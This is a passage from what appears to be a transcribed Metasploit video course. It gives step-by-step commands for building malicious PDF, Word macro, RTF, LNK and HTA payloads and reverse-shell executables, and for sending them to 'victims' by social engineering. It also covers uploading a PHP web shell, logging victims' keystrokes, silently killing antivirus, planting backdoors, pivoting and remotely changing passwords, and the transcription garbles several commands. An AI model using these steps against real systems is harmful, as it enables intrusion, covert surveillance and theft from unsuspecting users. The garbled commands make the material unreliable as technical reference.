addition, the script includes other libraries such as TCP. Type define space initialize info equals to flower presses. Type super update info. Type name equals to greater than, just quotation, keep it blank. Type description. Then we have the initialize function that is used to analyze the different values and content definition of the modules. Some of the primary definition of this function include name, description, author, version, and so on. That is register underscore options, opt, rport, 777, self.class, and. Next, we have the register option part of the script, which is responsible for providing essential and default values of the script. The values can be changed according to users' needs as well. It has been very similar to auxiliary modules. The difference lies in defining the exploit function. Type def space exploit. Type connect. Type sock.put payload.encoded. Type handler. Type disconnect. Type end. This is the main exploit body of the module that contains the shell code or the exploit pattern. The content of this function varies from exploit to exploit. Some of the key features that may exist in a remote exploit are listed in the body of the function. The connect function is used to open a remote connection with the target. It is a function defined in the remote TCP library. A payload is also an essential part of the exploit body, which helps in setting up back connections. We can also define handlers in the exploit body depending on the need. Optionally, you can also declare a vulnerability test function, check, which verifies whether the target is vulnerable or not. It verifies for all options except the payload. This was basic introduction to modules of Metasploit. In later on part of the course, we'll discuss some core concepts related to the exploits in the framework. So that's all in this video. Thank you for watching this video. Welcome. In this video, we will see file format based exploitation. We will see PDF based exploits. PDF file format exploits are those that create malicious PDF files which, when run on the victim system, will give the attacker complete access to the target system in the form of Metasploit shell. Here is a test cases and description. The vulnerability is Stack Overflow in unique name from the smart independent clip set table. Exploited on operating system is Windows 7 32-bit. Software version Adobe Reader 9. Affected version is Adobe Reader 9.3.4 and earlier version for Windows, Macintosh and Unix system. CV details, that is exploitation proofread. To exploit the vulnerability, we will create a malicious file and we will send it to the victim. When the victim tries to open our malicious PDF file, we will be able to get the Metasploit shell or the command shell based on payload used. Let's take a step further and try to build malicious PDF file. Let's open up Metasploit command prompt, load Adobe Cool Type Sync module. So type use exploit /Windows file format /Adobe Cool Type SING. Let's see what options we need to set in order to execute the attack properly. We set the payload as reverse_TCP to create a connection back to the attacker machine from the victim system. Type set payload Windows /Metasploit reverse_TCP. This is because we are not connecting to the victim directly. A victim may open a file eventually. Therefore, reverse_TCP will create a connection to the listener at the attacker system. We set all of the required options such as lhost and lport. These are required for making a correct connection back to the attacker's machine. Typeset lhost 192.168.0.12. Lport is 4444. After setting all of the options, we use the exploit command to create our malicious file. Here you can see that msf.pdf file is saved in root /msf4/local msf.pdf. Send this file to the victim. We need to launch an exploit handler which will listen to all of the connection made from PDF file to the attacker's machine. An exploit /multi/handler is very useful module in Metasploit that can handle any type of exploit connection that a victim's machine makes after exploitation. So that's it in this video on file format based exploitation, which you saw on PDF based exploits. Thank you for watching this video. Welcome. In this video, we are going to learn get shell using shellcode macro in Metasploit. We can execute shellcode directly in macro. It's very old method, but still it's useful because antivirus don't trigger it. First, we'll generate VB code of our payload, that is Visual Basics. Let's open up terminal, type MSF console. Let's load reverse_TCP payload into the MSF console. Type use payload /Windows Meterpreter /reverse_TCP. Type info. Here we can see that payload information, lhost listen port address, lport listen port, set lhost as 192.168.1.102, set lport as 443. Let's generate VBA script. Type generate -t VBA. Now we have generated our shell code. Now we will create macro. Open any Word or Excel document. Then click on view and then click on macros. Give name to macro and create a macro. Remove all things from modules windows and paste our generated VB code. Save it as type Word macro enabled document. Send this file to victim. By default in MS Office, disable all macros with notification option is enabled. So whenever any document try to execute macro, it will pop up security warning that macro is disabled. So to execute our shell code using macro, victim should click on enable content. You have to set up listener to listen reverse connection. If your IP is not available when victim open document, then the document will crash. So now we will set up listener. Once user click on document, Meterpreter session will be opened. So that's it in this video on get shell using shell code in macro in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn hack Linux or Windows PC using Python file, maintaining access in Metasploit using Python payload file. Let's open up terminal, create a Python payload using MSF Venom tool. Type MSF Venom space -p cmd command Unix reverse_Python lhost equals to 192.168.0.15, lport equals to 5555, root /desktop/update.py. Here we can see that payload is created. Let's listen incoming handlers. Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. We need to create a listener to handle reverse connection when the malicious file is executed on the victim's machine. Type use exploit /multi/handler. Type set Windows Meterpreter /reverse_TCP. Type show options. Here you can see that payload options. Let's set required options field. So type set lhost as 192.168.0.15, set lport as 5555, exploit it. Listening handler is started here. Now send this payload Python using social engineering technique. When the user executes Python file, we get Meterpreter session. Type system info. Here you can see that victim PC info. So that's it in this video on hack Linux using Python file, maintaining access in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn hack Mac Mini using Python script in Metasploit, or you can say any Mac system with OS X operating system. Meterpreter can easily be used to target OS X by using the Python version of Meterpreter, since all Mac OS ship with Python. If you are unfamiliar with Meterpreter, It is a backdoor program that allows you to execute a number of different built-in commands on the targeted computer, including spawning a shell, downloading or uploading files to or from the target computer, etc. Generate Python script with MSF Venom. Create a Meterpreter instance that will specifically connect back to our attacking computer from OS X. We will use MSF Venom to produce a Python-based Meterpreter. Using the reverse TCP option, which simply means that Meterpreter instance will connect back to our attacking system rather than specifically connecting directly to it from the attacking system. Let's open up terminal, type msf venom -p python meterpreter reverse tcp lhost equals to 192.168.0.13 lport equals to 6680 meterpreter, that is pytr.py. Let's load Metasploit using msf console command. Type exploit multi handler for handler to listen for Meterpreter. Type set payload python /meterpreter /reverse_tcp. The command tells the handler what payload we are using. Type set lhost 192.168.0.13 tells it the localhost IP. Type set lport 6680. The third says which port to listen to. It's important that this port matches the one used in generating the Meterpreter. To start up the handler, exploit -j -set. The command exploit simply tells Metasploit to start the exploit. The -j flag tells it to run in the context of a job, and -z simply means to not interact with the session once it becomes active. Running Meterpreter on the target OS X system now transfer the Python script we generated earlier with MSF Venom to the target system. Let's run Python file. Type python meterpreter.py back to Kali. Here you can see that we get Meterpreter session. Let's create a folder in victim PC. I'll just name it as Ajit, so type mkdir Ajit. Here you can see that folder is created successfully. So that's it in this video on hack Mac Mini using Python script. You can try it on any Mac which runs OS X operating system. So that's all in this video. Thank you for watching this video. Welcome. In this video we are going to learn hack remote Windows or Linux PC using MPC tool. MSF Venom payload creator, that is MPC, is a wrapper to generate multiple types of payloads based on user's choice. The idea is to be as simple as possible to produce their payload. Fully automating MSF Venom and Metasploit is the end goal. The rest is to make users' life as easy as possible. The only necessary input from the user should be defining the payload they want by either the platform or the file extension. If you don't remember your IP for interface, then don't worry, just use the interface name ETH0. And if you don't know what your external IP is, MPC will discover it, that is WAN. Want to generate one of each payload? No issue, try loop. Want to mass create payloads? Everything, or to filter your select? Either way, it's not a problem. Let's open up terminal, download latest MPC tool from GitHub, type cd desktop and git clone, and the URL, that is github.com mi1kmpc.git. and hit enter. Here you can see that download is started. Type cd mpc and type ls. Here you can see that mpc directory files. Let's change file permission. Type 777 space msfpc.sh. Execute msfpc file type ./msfpc. Here you can see that module information and some of the basic examples. Type apk, asp, aspx and so on. Let's create backdoor for Windows PC. Type .msfpc.sh Windows 192.168.1.103. Here you can see that it will automatically create Windows Meterpreter exe and save in your MPC folder. Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Let's open up MSF console load handler module. Type use exploit /multi/handler. Set payload as reverse TCP. Type set payload windows /meterpreter /reverse_TCP. Set lhost as 192.168.1.103. Type show option. Here you can see that L port is 444. Now change the port address. Type set L port as 443. Exploit. Now send our exe files to the victim using any social engineering technique. Now when the victim will use exe, you will get the Meterpreter of victim PC. So that's it in this video on hack remote Windows or Linux PC using MPC in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn how to hack Windows 7, 8, 8.1, 10 using Shikata GANI encoder in Metasploit. This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction, substitution, and dynamic block ordering. Registers are also selected dynamically. Let's open up terminal and type ifconfig. You can see that 192.168.0.7 IP address. Let's create a backdoor using MSF console. Type msf venom space -h. You can see that basic usage and options. Type msf venom -p Windows Meterpreter reverse TCP lhost equals to 192.168.0.7 L port equals to 444 -f exe -e x64 Shikata GANI space I 10 greater than hack.exe. Type ls. You can see that hack.exe file is generated. Let's send this exe file using social engineering technique. Open up MSF console. Load the x64 /Shikata GANI module into the MSF console. Type use exploit /x86 Shikata GANI. Let's set the payload as reverse TCP. Type set payload Windows Meterpreter /reverse_TCP. Type show option. Here you can see that the basic options: lhost, localhost address, lport, local port. Type set lhost 192.168.0.7. Let's execute it. You can see that listening reverse_TCP handler on 192.168.0.7 444. Once victim clicks on hack.exe file, we get Meterpreter session. That's it in this video on hack Windows 7, 8, 8.1, 10 using Shikata GNAI encoder in Metasploit. Thank you for watching this video. Welcome. In this video we will see how to hack Windows PC of version 7, 8 and 10 with HTA Web Server. What is HTA Web Server? HTA stands for HTML application. So this server hosts a HTML file which when opened will execute a payload via PowerShell. Of course, this browser warns the user before executing the payload. Now let's see how this works. We will use this exploit to hack Windows 10. Let's open up terminal, type msf console. Now search HTA server. Here you can see that HTA server module path. Exploit Windows MISC HTA server. Load HTA server into msf console. Type use exploit Windows MISC HTA server. Type show options. Here we can see that HTA server module options. SRE host the local host to listen on. This must be an address on the local machine. SRE port the local port to listen, and so on. Type set SRE port 192.168.0.14. Let's set the payload as reverse TCP. Type set payload Windows Meterpreter reverse TCP. Type show options. Here you can see that payload option. Let's set the lhost address as 192.168.0.14. Type set lhost 192.168.0.14. Let's execute it. Type exploit. As you can see, it has generated an URL. We need to make the victim click on this particular URL for our exploit to work. We have already seen this in previous video how to make it happen and all. When the victim clicks on the URL and download our HTA file, when the user ignores and click on run, a Meterpreter session is opened. Back to Kali, here you can see that our Meterpreter session is opened here. Type sessions -i1. Meterpreter command prompt is opened here. Type system info. Here you can see that remote PC information. OS Windows 10. So that's it in this video on hack Windows 7, 8 and 10 with HTA Web Server exploit. Thank you for watching this video. Welcome. In this video we will see hack Windows using EFS server exploit in Metasploit. Let's start by opening terminal and open msf console. Let's search easy file sharing. Type search easy file sharing. Here you can see it started here. You can see matching modules. So now I'm going to do easy file sharing HTTP server 7.2 SH overflow. Type use exploit /windows HTTP easy file sharing _SEH. Here you can see it's selected. Let's see the module information. Type info. Here you can see information. Name easy file sharing HTTP server 7.2 SEH overflow. Basic options: rhost remote host IP address, rport remote host port address, payload information, description, and so on. So now type set rhost 192.168.1.100, rhost selected. Next set rport 80. Let's set payload as Windows Meterpreter reverse TCP. You can see payload selected. Open new terminal and type ifconfig. Here you can see IP address. Copy it. Type set lhost and paste IP address. Lhost is selected. Set lport, so type lport 444. Lport is selected. Type show option to see options. Here you can see options. Type set rhost 192.168.1.107. Victim PC address. Rhost is selected. Now type show option to see options. Now type exploit. Here you can see it started. Better session 2 opened. Now type system info to see system information. You can see information, computer, YTPC, OS, Windows 7 and so on. So that's all in this video on hack Windows using EFS server exploit using Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn how to hack Windows using new media center exploit in Metasploit. This module exploits vulnerability in Windows Media Center ms15100mcl.rb, that is Ruby Rails. Rapid 7 have added this module to the framework and you won't need to add the module, but time is critical here. Let's open up terminal. Type msf console. Let's search for the module to make certain it is available to you. Type search ms15100. Let's load the ms15100 MCL module into msf console. Type use exploit Windows file format ms15100 MCL. Let's type info to see what requirement this module needs. You can see we need to provide this module both the file name and file underscore name. One is the .mcl file and the other is malicious file. We will load onto the victim system. Set file name as best music video ever.mcl. Type set file name best video.exe. We also need to set a payload. I will use the Windows Meterpreter. Type set payload Windows Meterpreter reverse underscore TCP. Set lhost as 192.168.1.108. Let's exploit it. Type exploit. Metasploit saved in the file at root msf4 local best music video ever.mcl. That is the file we need to get to the victim. Metasploit has now created our .mcl file and opened and shared on the network. We now need to send this file. When the victim clicks, we get Meterpreter session. So that's it in this video on hack Windows using new media center exploit in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn Microsoft RTF stack buffer overflow vulnerability. The RTF buffer overflow exists in both the 2010 and 2007 version of the Office software pack. This vulnerability exists in the handling of p-fragments shape property within the Microsoft Word RTF parser. Let us understand this exploit in detail. I am assuming that we have already gained information about our target, that it has Office pack installed on his or her system. Let's open up terminal. Type launch msf console interface. The exploit will be using exploit /Windows file format ms10087 rtf p fragments pof. So type use exploit /Windows file format ms10 087 rtf p fragments pof. Type info. Here you can see that available targets MS Office 2002, 2003 and so on. The module basic options and module brief description. The payload we will be using is Windows /Meterpreter /reverse_TCP to get shell connectivity with the target machine. Type set payload as Windows /Meterpreter reverse TCP. Set file name as price info. Set lhost as 192.168.0.14 in Linux localhost address. Set port as 8080. Type exploit. Metasploit has created a malicious file for us, which we will have to use in order to proceed with the client-side attack. The file is located at root.msf4 local priceinfo.rtf. Send this file to the target user either through a mail or some other medium. Once the target user executes this malicious file, you will notice that it will open as a Word document. After a few seconds of execution, the Microsoft Word instance will either hang or crash depending upon the system. In the meantime, the malicious file successfully executes the exploit and provides an active session with the target. We need to create a listener to handle reverse connection when the malicious file is executed on the victim system. Type use exploit /multi /handler. Type set Windows Meterpreter reverse_TCP. Type set lhost as 192.168.0.14. Exploit it. When the victim opens it, it sends Meterpreter session. So that's it in this video on Microsoft Word RTF stack buffer overflow in Metasploit. Thank you for watching this video. Welcome. In this video, we are going to learn LNK code execution vulnerability in Metasploit module. Today, we are going to learn about a remote code execution exploit in Microsoft Windows. It's called Microsoft Windows LNK CVE 2017-8464 LNK RCE exploit. Earlier, also we have some LNK vulnerabilities in Microsoft Windows, but this one is special because a victim need not even click on the file we are creating as part of this exploit. We can host this file on web server and direct our victim to that site. Otherwise, we can save the file to USB drive and insert it in our target system. The both require a bit of social engineering. This exploit works due to vulnerability in Microsoft Windows that could allow remote code execution. An attacker who successfully exploits this vulnerability could gain the same user rights as the local user. Let us see how this exploit works. Let's open up terminal, type msf console. Let's load the CVE 2017-8464 LNK RSE module into the msf console. So type use exploit /Windows file format CVE _ 2017-8464 LNK RCE. Type command info to see more information about the module. Let's see the basic option. The DLL name, the DLL file name containing the payload, drive letter assigned to USB drive on victim's machine, file name, the LNK file name. Now let's set the Windows/Meterpreter/reverse_TCP payload, type set payload Windows/Meterpreter/reverse_TCP, type show option. Here you can see that payload option. Let's set lhost as 192.168.0.14. Type lhost space 192.168.0.14. Type exploit. Here you can see that lnk file is created in root/.msf4/local directory. Now let's load exploit multi-handler tool. Type use exploit /multi/handler. Set payload as Windows/Meterpreter/reverse_TCP. Type set payload Windows/Meterpreter/reverse_TCP. Type lhost as 192.168.0.14. Let's execute handler listener. Type exploit. Here you can see that it is listening on 4444 port. Send lnk file to victim using social engineering technique. Once he open, Meterpreter session will open up here. That's it in this video on lnk code execution vulnerability in Metasploit module. Thank you for watching this video. Welcome. In this video, we are going to learn how to use Metasploit's web delivery exploit to create a script to connect to Unix, Linux or OS X machine using Python. Web delivery exploit will work on Windows systems that have Python installed. Few Windows systems actually have Python installed, while nearly every Unix, Linux and OS X has Python installed by default. Let's open up a terminal and start Metasploit. Type msf console. Let's load the web delivery exploit. Using Metasploit's web delivery is very similar to web delivery on Unix, Linux and OS X system, except that Windows system don't have Python installed by default. Type use exploit /multi script web delivery. We need to set the lhost and lport exactly like we did with Linux X web delivery exploit. Type set lhost 192.168.0.14. Type lport 444. We need to set URL path. I set it here to Powersploit. Set the target to PowerShell. The web delivery exploit in Metasploit uses Python script. To use Windows-based PowerShell option, we need to set the target to 2. Type set target 2. With the target set to 2, Metasploit will create a PowerShell script. When we are ready to exploit, we need to set the payload. Let's use Windows/PowerShell reverse TCP payload. Now we can type exploit and Metasploit will start a small web server in the background and generate a command for us to use on the Windows system. Copy the command and run this command in the victim PC. You can send this command by using batch file or send this using social engineering technique. Here you can see that we get the sessions. So that's it in this video on Powersploit web delivery for Windows in Metasploit. Thank you for watching this video. Welcome. In this video, you will learn how to manage multiple sessions of different targets in the network. Once you hacked more than one system in the network and received multiple Meterpreter sessions in your Linux, then how will you retrieve data simultaneously from all targets? First, an attacker needs to create a payload and share it in the network with its target. Then start multi-handler in Metasploit framework. Now when available target will open the payload in their system, the attacker will receive the series of sessions. Let's open up terminal. Here I already created Metasploit session. Type sessions. Here you can see that 2 sessions are created on YTPC. In order to gather the information from both targeted system, simultaneously I had used post exploitation, which let an attack to execute same command for multiple sessions at a time. Let's load post multi general execute module. Type use post / multi general execute. Type info. Here you can see that module information, basic option, command the entire command line to execute on the session to run this module on, set the command IP config, set session as 1. Let's execute it. You can see I have executed IP config to know the network configuration for session 1, and here the target IP is 192.168.0.4 as a result. So that's all in run OS command against multiple session in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn username map script command execution in Metasploit. This module exploits a command execution vulnerability in Samba version 3.0.20 through 3.0.25 RC3. When using the non-default username map script configuration option, by specifying username containing shell meta characters, attackers can execute arbitrary command. No authentication is needed to exploit this vulnerability, since this option is used to map usernames prior to the authentication. Let's open up terminal and type MSF console. Let's load username map script module into the MSF console. Type use exploit / multi / samba / user map _ script. Type info. Here you can see that module information, our host the target address, our port the target port. Let's set payload as command / Unix / reverse. Type show options. Here you can see that payload and module options. Set remote host target address as 192.168.1.106. Type set our host 192.168.1.106. Type lhost the local host address as 192.168.1.105. Let's execute it. Type exploit. Here you can see that we get command shell session 1 opened. Type ID. Here you can see that UID and GID equals to root. So that's it in this video on Samba privilege escalation in Metasploit, or you can say username map script command execution in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn unrestricted file uploading PHP upload in Metasploit using BWAP vulnerability application. File upload vulnerability is a major problem with web-based application. In many web servers, this vulnerability depends entirely on purpose. That allows an attacker to upload a file with malicious code in it that can be executed on the server. An attacker might be able to put a phishing page into the website or deface the attacker may reveal internal information of web server to other, and in some chances the sensitive data might be informal. and can be accessed by unauthorized people. You learn the different injection techniques to upload a malicious file of PHP in the web server and exploit them. In this scenario, a simple PHP file will get uploaded on the web server without any restriction. Here, server does not check the content, type, or file extension to be uploaded. For example, a server allows to upload a text file or image, which is considered as a data, and if security parameter is low, there is no restrictions on the content type or file name, then you can easily bypass malicious PHP file, which is considered as application in the web server. Let's open up terminal and type ifconfig. Here you can see that Linux IP address. Let's copy it. Now we are going to create the malicious PHP script using msfvenom tool. Type msfvenom -p as a payload, php/meterpreter/reverse TCP, lhost, localhost address or attacker IP address, that is 192.168.0.14, port listening, the port address is 444, -f raw. Let's copy the PHP malicious script. Let's open up text editor, paste our malicious script and save as hack.php on desktop. Here you can see that file is created and saved on desktop. Let's open up browser and go to bweb. Here I am selecting unrestricted file uploading option. We can see that unrestricted file upload page is opened here. Let's upload our hack.php file. Click on Browse Input button. Select the hack.php file. Click on Upload it. We can see that file is uploaded. After uploading the PHP file, it will show the path of directory where your file is successfully uploaded. Back to terminal, open up msf console. Type use exploit /multi/handler set payload php meterpreter /reverse TCP. Type show option. Here you can see that payload options. Let's set lhost address. Type set lhost 192.168.0.14. Type exploit. Payload handler is started here. Let's open up our uploaded file link. You can observe I have got Meterpreter session 1 of victim PC on the Metasploit. Type system info computer bbox OS Linux. So that's all in this video on unrestricted file uploading PHP payload in Metasploit. Thank you for watching this video. Welcome. In this video we will see VSFTP exploitation in Metasploit. Exploit modules are searchable in Metasploit. At the MSF prompt, you can use the search command with any word or text string entered after the command. Let's open up MSF console. Type search VSFTPD. The Metasploitable image is vulnerable, so we will use that against the target machine. At the MSF console prompt, type user command. Type info exploit Unix FTP VSFTPD 234 backdoor. Here you can see that module information with basic options and their descriptions. Type use exploit Unix FTP VSFTPD 234 backdoor. You will see console prompt changed, signaling MSF is currently operating with that exploit ready to go. But before running the exploit, we must set the remote host, that is target. Type set rhost 107.180.54.186. Type exploit. Here you can see that this is private system, no anonymous login. Now let's try it on Metasploitable 2 machine. Type set rhost 192.168.0.12. Here you can see that rhost is set Metasploitable 2 machine IP address. Now type show payload. Here you can see that CMT Unix interact payload. Let's set interact payload. Type show options. Here you can see that required options are set. Now let's exploit it. Type exploit. We can observe that command cell session 1 is opened. So that's it in this video on VSTP exploitation in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn ERP scanner and check VM, which is Metasploit post-exploitation module. The ERP scanner post module will perform an ERP scan for a given range through a compromised host. Let's open up terminal. Here I already opened Interpreter command prompt. Type run post windows gather ERP_scanner our host equals to 192.168.0.124. Here you can see that 192.168.0.1 unknown host, 192.168.0.5 Best IT World India Private Limited, again 192.168.0.7 Best IT World India Private Limited, and so on. ERP scan for a given IP range through a Meterpreter session. Check VM. The check VM post module is simply enough. Checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMware, VirtualBox, Xen, and QEMU virtual machines. Type run post/windows gather check VM. Here we can see that checking YTPC is a virtual machine. YTPC appears to be physical machine. So that's it in this video on ERP scanner and check VM. Thank you for watching this video. Welcome. In this video we are going to learn broadcast YouTube video in remote PC in Metasploit. This module will broadcast a YouTube video on all compromised systems. It will play the video in the target machine's native browser in full screen mode. The VID data store option is the V parameter in your YouTube video's URL. Let's open up MSF console. Here I already created Meterpreter session. Type sessions. You can see activated session. Let's load the play YouTube module into the MSF console. Type use post/multi manage play_YouTube. Type info. Here you can see module information. Session the sessions to run this module on. VID the video ID to the YouTube video. Let's set the session. Type set session 2. Type set VID GAV11 and so on, which is the video ID of the video which you can get from the YouTube. Let's execute it. Type exploit. Here you can see that GAV11, the video with this ID, is broadcasting in victim PC. So that's it in this video on broadcasting YouTube video in remote PC. Thank you for watching this video. Welcome. In this video, we are going to learn enum application and enum logged on users Meterpreter post-exploitation modules in Metasploit. Let's open up terminal. Here I am already open Meterpreter command prompt. Type run post windows gather enum underscore application. Here you can see that application installed in remote host, application name and its version. Enum logged on user. The enum logged on user post module returns a listing of current and recently logged on users along with their SIDs. Type run post /windows /gather /enum logged on users. Here you can see that currently logged users, SID and username as Whitey. The result is saved in root MSF4 loot directory. You can see the recently logged users. So that's it in this video on enum application and enum logged on users in Metasploit post-exploitation modules. Thank you for watching this video. Welcome. In this video, we will learn how to use keylogger Meterpreter console in Metasploit. After you have exploited a system, there are two different approaches you can take, either smash and grab or low and slow. Low and slow can lead to a ton of great information if you have the patience and discipline. One tool you can use for low and slow information gathering is the keystroke logger script with Meterpreter. This tool is very well designed, allowing you to capture all keyboard input from the system without writing anything to disk, leaving a minimal forensic footprint for investigators to later follow up on. Perfect for getting password, user accounts and all sort of other valuable information. Let's open up terminal. Here you can see that I already created Meterpreter session. In previous video, I shown how to create session using MSF modules. Type sessions -i19. Here you can see that 19 Meterpreter session is opened. Type help. Here you can see that all command information. We start the keylogger. Type keyscan start. Here you can see that keystroke sniffer is started here. Type keyscan underscore dump. Wait for some time and dump the output. Type keyscan dump. Here you can see that user typed keys. Let's try once again. Type keyscan dump. Here you can see that targeted user typed keyboard keys. Here you can see by logging to the winlogon process allows us to effectively harvest all users logging into the system and capture it. So that's it in this video on how to use keylogger in Meterpreter using Metasploit. Thank you for watching this video. Welcome. In this video, we are going to learn HTTP remote host server information gathering in Metasploit. The HTTP version scanner will scan a range of hosts and determine the web server version that is running on them. Let's open up terminal. Start PostgreSQL. Type MSF console. Let's load HTTP version in MSF console. That is type use auxiliary /scanner /http /http underscore version. Type info. Here you can see that module information. Basic option as proxies, a proxy chain of format type, host port, rhost the target address range or CIDR identifier, rport the target port, and so on. Display the version information about the system. Let's set rhost as hackingtude.com. typeset rhost 103.180.54.186. Let's execute it. Here you can see that hacking2.com server version name as Apache 2.4.25. Armed with the knowledge of the target web server software, attacks can be specifically tailored to suit the target. So that's it in this video on HTTP remote host server information gathering in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn kill av.rb script to disable antivirus program. We focused on various techniques that can be implemented to bypass the client-side antivirus protection and open an active session. What if we want to download files from the target system or install a keylogger and so on? Such activities can raise an alarm in the antivirus. So once we have gained an active session, our next target should be to kill the antivirus protection silently. So basically this tool or this video is all about deactivating antivirus. Killing antivirus is essential in order to keep our activities undetected on the target machine. We'll be using some of the Metasploit script available to us during an active session. Let's open up terminal. Here I already created Metasploit session. Type sessions. Type -i1. A Metasploit provides a very useful script named kill av.rb, which can be used to kill the antivirus process running on the target system and thus disable them. Let us try this script on our Windows 7 target, which is running ESET Node 32 antivirus. Type run space kill av. The run command is used to execute Ruby script in Metasploit. Once the script has executed, we can again check the running processes on the target in order to make sure that all of the antivirus process have been killed. If none of the antivirus process are running, then it means that the antivirus has been temporarily disabled on the target machine, and we can now move ahead with our penetration testing process. Type kill av space -h. Here we can see that basic usage. So that's it in this video on kill av.rb script to disable antivirus program in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn local exploit suggester post exploitation module in Metasploit. This module suggests local Metasploit exploits that can be used. The exploits are suggested based on architecture and platform that the user has shell opened, as well as the available exploit in Metasploit. It is important to note that not all the local exploit will be fired. The exploits are chosen based on these conditions, that is session type, platform architecture, and required options. Let's open up MSF console. Here I already created Metasploit session. Let's load the local exploit suggester module into the MSF console. Type use post forward multi /recon /local _exploit _suggester. Type info. Here you can see that module information session The session is run in this module and it's on. Description displays a detailed description for the available exploit. Set session as 1. Execute it. Here you can see that 37 exploit checks are being tried. Target host appear to be vulnerable. So that's it in this video on local exploit suggester post-exploitation module in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn Meterpreter architecture migration exploit in Metasploit. This module checks if the Meterpreter architecture is the same as the OS architecture, and if it's incompatible, it spawns a new process with the correct architecture and migrates into that process. Let's open up terminal, type sessions. Here you can see that 2 Meterpreter sessions are opened here. Now I'm going to search arc migrate post exploitation module. Type search arc migrate. Here you can see that arc migrate module path as post/windows/manage arc migrate. Let's load this module in the MSF console. Type use post/windows manage arc migrate. Type info. Here you can see that module information, some module options, exe executable to start migrate, fallback selected executable does not exist, session as session to run this module, and so on. Let's add session as session 1 and finally exploit it. Here you can see that migration executed successfully. So that's it in this video on Meterpreter architecture migration exploit. Thank you for watching this video. Welcome. In this video we are going to learn MET-SVC exploitation in Meterpreter. Metasploit offers the ability to place a backdoor on the remote system in order to maintain access after your exploitation. In this video we will see how we can work with MET-SVC backdoor and what are the limitations of it. Let's say that we have already compromised the target by using Meterpreter service payload. Let's open up terminal. Here I already opened session. Type sessions. Let's use session 2. Type sessions -i2. Metasploit offers the ability to place a backdoor on the remote system in order to maintain access after your exploitation. We will see how we can work with MET-SVC backdoor and what are the limitations of it. Let's say that we have already compromised the target by using a Meterpreter service payload. We can have a look at the available options of the MET-SVC backdoor by executing the command type run MET-SVC. This command will upload some files and it will create a Windows service on the remote machine which will run on the port 31337. If you want to remove the backdoor from the target machine, you can use the command run MET-SVC-r in order to achieve that. Exit from Meterpreter. Type use exploit /multi/handler. Set payload as Windows Meterpreter reverse TCP. Set rhost and lhost. Our target system will send the Meterpreter sessions. The MET-SVC backdoor runs as a service on the remote system and requires no authentication, so anyone that will find the backdoor can connect through it to our target. Also, it can be discovered easily by using a simple port scanner, so it is risky to use. From the other hand, it is less noisy compared to the persistence backdoor. Don't try this backdoor in real system. If you want to use it in order to expand your knowledge about backdoor, then use it on a safe and isolated environment. So that's it in this video on METSVC exploitation in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn port forward in Metasploit. The port forward command from within the Metasploit shell is most commonly used as a pivoting technique, allowing direct access to machines otherwise inaccessible from the attacking system. Running this command on a compromised host with access to both the attacker and destination network, we can essentially forward TCP connection through this machine, effectively making it a pivot point. Much like the port forwarding technique used with an SSH connection, port forward will relay TCP connection to and from the connected machine. Let's open up terminal. Here I already opened Metasploit command prompt. Type port forward --h will display the command's various options and arguments. Basic options -L to use specify the listening host. Unless you need the port forwarding to occur on specific network adapter, you can omit this option. If none is entered, 0.0.0.0 will be used. -H, that is help option, it will display the same thing. -L is a local port which will listen on the attacking machine. Connection to this port will be forwarded to the remote system. -P, the port to which TCP connection will be forwarded to. -R, the IP address the connections are laid to. Arguments add, this argument is used to create the forwarding. Delete, this will delete a previous entry from our list of forwarded ports. List, this will list all ports currently forwarded. Flush, this will delete all ports from our forwarding list. Add basic syntax, port forward, add -L 3389 -P 3389 -R target host. Add will add the port forwarding to the list and will essentially create a tunnel for us. Please note this tunnel will also exist outside the Metasploit console, making it available to any terminal session. -L 3389 is a local port that will be listening and forward to our network. This can be any port on your machine as long it's not already being used. -P 3389 is destination port on our targeting host. -R target host is our targeted system's IP or host name. Type port forward, add -L 3389 -P 3389 -R 192.168.0.4. You can see local TCP relay created. Delete, entries are deleted pretty much like the previous command. Once again from an active Metasploit session. Syntax port forward delete -L 3389 -P 3389 -R target host. Type port forward delete -L 3389 -P 3389 -R 192.168.0.4, which is target host. You can see successfully stopped TCP relay on 0.0.0.0 3389. 3. Deleting a port. List, this argument needs no option and provides us with a list of currently listening and forwarded ports. Type port forward list. Here you can see that one active forward list. Flush, this argument will allow us to remove all the local port forward at once. Type port forward flush. You can see successfully flushed one rules. So that's it in this video on port forward in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn Route Add Post module in Metasploit. What is pivoting? Pivoting is a unique technique of using an instance to be able to move around inside a network, basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible system. In this scenario, we will be using it for routing traffic from a normally non-routable network. For example, we are a pen tester for security. You pull the company directory and decide to target a user in the target IT department. This module manages session routing via an existing Meterpreter session. It enables other modules to pivot through a compromised host when connecting to the named network and submask. AutoAdd will search a session for valid subnet from the routing table and interface list, then add routes to them. Default will add a default route so that all TCP or IP traffic not specified in the MSF routing table will be routed through the session when pivoting. See documentation for more. Info -t and click knowledge base. Let's open up terminal. Here I've already created Meterpreter session. Type sessions. Session 1 is active session. Let's load auto route module into the MSF console. Type use post multi /manage auto route. Type info basic option cmd specific the auto route command. Session the session to run this module. Module brief descriptions. Set session as 1. Let's execute it. This module is running on YTPC. Here you can see that route added to subnet 192.168.88.0 255.255.255.0 from host routing table. So that's it in this video on route add post exploitation module in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn set new password of victim PC remotely in Metasploit. This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account's password on a remote host to avoid the error. System error 1907 has occurred, which is caused when the account policy enforces a password change before the next login. Let's open up terminal. Here I already created connections. Type sessions. Let's load the change password module. Type use post /windows manage change password. Type info. Here you can see that change password module information. Let's see the basic options. New password, setting new password, old password, original password, session the session to run this module on, and so on. 